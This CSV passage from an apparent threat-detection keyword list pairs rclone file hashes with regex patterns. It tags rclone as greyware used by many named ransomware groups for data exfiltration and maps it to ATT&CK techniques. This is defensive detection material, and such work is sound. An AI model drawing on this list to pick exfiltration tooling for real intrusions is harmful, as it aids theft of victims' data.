"*7ff2dd43787517d40d5618d6e682042bb8922b08db67d3581d00f1876737b578*",".{0,1000}7ff2dd43787517d40d5618d6e682042bb8922b08db67d3581d00f1876737b578.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*801705a8ff1da87d84dc70691d964f7b64719e7f5c35f83011c4d90eacd478bd*",".{0,1000}801705a8ff1da87d84dc70691d964f7b64719e7f5c35f83011c4d90eacd478bd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8057f21ea07c17333d815dd0d088b709c9cc3de1bb60104cf41960e9efa078d9*",".{0,1000}8057f21ea07c17333d815dd0d088b709c9cc3de1bb60104cf41960e9efa078d9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*805df2a938819abf6d502f6d607ac78a8fa39f5027b21997f65daeb358a36c82*",".{0,1000}805df2a938819abf6d502f6d607ac78a8fa39f5027b21997f65daeb358a36c82.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*80afb1294e5136dc196ac707ba1da2c66624e67e3467954a152115478a964b73*",".{0,1000}80afb1294e5136dc196ac707ba1da2c66624e67e3467954a152115478a964b73.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*80c4fd53fa4391adb0414bd60b34d05fa0371f95859b97d39e2238d32ef549aa*",".{0,1000}80c4fd53fa4391adb0414bd60b34d05fa0371f95859b97d39e2238d32ef549aa.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*813001f641f1f6efbfeed1b4ac4ca22274c3264d6f5d055778087b9878089013*",".{0,1000}813001f641f1f6efbfeed1b4ac4ca22274c3264d6f5d055778087b9878089013.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*815cdd766373b7d6c0a3274ed9f18c2f1d585787415e19087ca489a82c0b6b8d*",".{0,1000}815cdd766373b7d6c0a3274ed9f18c2f1d585787415e19087ca489a82c0b6b8d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*81641ea0fd6b019e4120a46637c12981003e672b45b00248414697241cda8518*",".{0,1000}81641ea0fd6b019e4120a46637c12981003e672b45b00248414697241cda8518.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*81d2eda23ebaad0a355aab6ff030712470a42505b94c01c9bb5a9ead9168cedb*",".{0,1000}81d2eda23ebaad0a355aab6ff030712470a42505b94c01c9bb5a9ead9168cedb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*81e7be456369f5957713463e3624023e9159c1cae756e807937046ebc9394383*",".{0,1000}81e7be456369f5957713463e3624023e9159c1cae756e807937046ebc9394383.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*822855a1e7c58a8b1cf0ec31a900a03009dd1015135f98d99cf6aac1472b000f*",".{0,1000}822855a1e7c58a8b1cf0ec31a900a03009dd1015135f98d99cf6aac1472b000f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*826463d9a2bc5e511e091c24be7d4bf6f2df396702662fb528498223ccb39b94*",".{0,1000}826463d9a2bc5e511e091c24be7d4bf6f2df396702662fb528498223ccb39b94.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*829f65af61d795563f2651987a1146b49eaad6469d779074c4efd32433b4a6cd*",".{0,1000}829f65af61d795563f2651987a1146b49eaad6469d779074c4efd32433b4a6cd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*82aa8a39e1cc14668a60048c7375ebd45f1bb5734863ad2cac1309c63f05c57f*",".{0,1000}82aa8a39e1cc14668a60048c7375ebd45f1bb5734863ad2cac1309c63f05c57f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*82e748eaceebf6c4612c4d7fb4c3bd9773c954ba7ef0a4912bca33084b14c2c7*",".{0,1000}82e748eaceebf6c4612c4d7fb4c3bd9773c954ba7ef0a4912bca33084b14c2c7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*82ecdddcaec5ccde85ce2235c25aaebc70f24d3837917d7816c32ed6874c495f*",".{0,1000}82ecdddcaec5ccde85ce2235c25aaebc70f24d3837917d7816c32ed6874c495f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*82fe60166f0c57916272576f45e5465f16b5b8272c37cfc3786de8130a0c48e4*",".{0,1000}82fe60166f0c57916272576f45e5465f16b5b8272c37cfc3786de8130a0c48e4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*830d07f44abea51f4549edc31d61ad228e6621c60aebfd6e241ca5aa5abf14f7*",".{0,1000}830d07f44abea51f4549edc31d61ad228e6621c60aebfd6e241ca5aa5abf14f7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*832974dc5dbee7b88c6d51acbcbe612ca5e2ee5a7d3101308135e433246cdb8f*",".{0,1000}832974dc5dbee7b88c6d51acbcbe612ca5e2ee5a7d3101308135e433246cdb8f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*843af28bae0fffafaf6c1aadce104fd299b3bd4c0b6d2d72ae9f4f7000167cf5*",".{0,1000}843af28bae0fffafaf6c1aadce104fd299b3bd4c0b6d2d72ae9f4f7000167cf5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*84431e99daa0524ebef7f8ca6090243f7287b52bdd37afcbbdad8c52c516d5c5*",".{0,1000}84431e99daa0524ebef7f8ca6090243f7287b52bdd37afcbbdad8c52c516d5c5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*84dcc12153f8b7d66923070bf81d5c8f5dbc300baf8c37d7ab41f79d60358ab5*",".{0,1000}84dcc12153f8b7d66923070bf81d5c8f5dbc300baf8c37d7ab41f79d60358ab5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*84f1ec6bd03bb770c9efe79a396dbd41ad417d691522638a331a493dfc42f0f2*",".{0,1000}84f1ec6bd03bb770c9efe79a396dbd41ad417d691522638a331a493dfc42f0f2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*853e033af8339767d2ccc03845763bd250238ee0642d4042e027a5359a56760d*",".{0,1000}853e033af8339767d2ccc03845763bd250238ee0642d4042e027a5359a56760d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*85c5f89ba2e10c646acc5912cb3a8c33857c40551b363257f23cfe855a1e3c54*",".{0,1000}85c5f89ba2e10c646acc5912cb3a8c33857c40551b363257f23cfe855a1e3c54.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*85c623d7808f9d2cf51945e02e98d02b94f9f32ea892237f9a58b544c7a4f4f9*",".{0,1000}85c623d7808f9d2cf51945e02e98d02b94f9f32ea892237f9a58b544c7a4f4f9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*85d2f62537a5e72af0ea4f43f1d476f95f2081db5d42836823ba9be7684c7ac2*",".{0,1000}85d2f62537a5e72af0ea4f43f1d476f95f2081db5d42836823ba9be7684c7ac2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*85dcecfbdf9927330ab06a6d347e91d6e780ee800bd9aa1b82b9d32f8c83a72f*",".{0,1000}85dcecfbdf9927330ab06a6d347e91d6e780ee800bd9aa1b82b9d32f8c83a72f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*861fe019ac96ac55b5e0e97c8d6138773a11b64f8cbd3530f51f56eb6009326c*",".{0,1000}861fe019ac96ac55b5e0e97c8d6138773a11b64f8cbd3530f51f56eb6009326c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*865bbc5b3cae67db29423ec7c3d4795e2685dd568ae504087a1a36aca8b78cba*",".{0,1000}865bbc5b3cae67db29423ec7c3d4795e2685dd568ae504087a1a36aca8b78cba.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*86bfc150238405ea58c396e25766dee4b1e01caedbcfd32ed3fd74533e29d910*",".{0,1000}86bfc150238405ea58c396e25766dee4b1e01caedbcfd32ed3fd74533e29d910.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*86f782aab22bf6fff00382de47905a313a94c3e6d1d73d9f8100c59472d48e08*",".{0,1000}86f782aab22bf6fff00382de47905a313a94c3e6d1d73d9f8100c59472d48e08.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8704f3f1748b05a7d936a23172b3248acda6e5dfbe58a192872ae779755de513*",".{0,1000}8704f3f1748b05a7d936a23172b3248acda6e5dfbe58a192872ae779755de513.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*876f05d707463603766c0d3073d2806f6a3b89b50d4c1c32f5a754a3db52c5c4*",".{0,1000}876f05d707463603766c0d3073d2806f6a3b89b50d4c1c32f5a754a3db52c5c4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*877dc57373b8c8b98f7afb6a818a465dbf855f8d6a9b7330805fa08abfb197c3*",".{0,1000}877dc57373b8c8b98f7afb6a818a465dbf855f8d6a9b7330805fa08abfb197c3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
